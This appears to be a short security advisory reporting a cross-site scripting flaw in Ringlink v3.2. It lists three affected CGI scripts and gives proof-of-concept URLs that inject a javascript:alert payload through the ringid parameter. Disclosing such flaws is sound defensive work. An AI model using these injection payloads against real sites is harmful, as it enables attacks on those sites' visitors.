Ringlink version 3.2 is susceptible to cross site scripting attacks.
331c00ac7e9b1b72b916d4f8f9e2d79772ded73680a18f2549d81b28645e4bf9
Ringlink v3.2
Homepage:
http://www.ringlink.org
Effected files:
next.cgi
stats.cgi
list.cgi
XSS Vulnerability PoC:
http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
http://www.example.com/ringlink/list.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]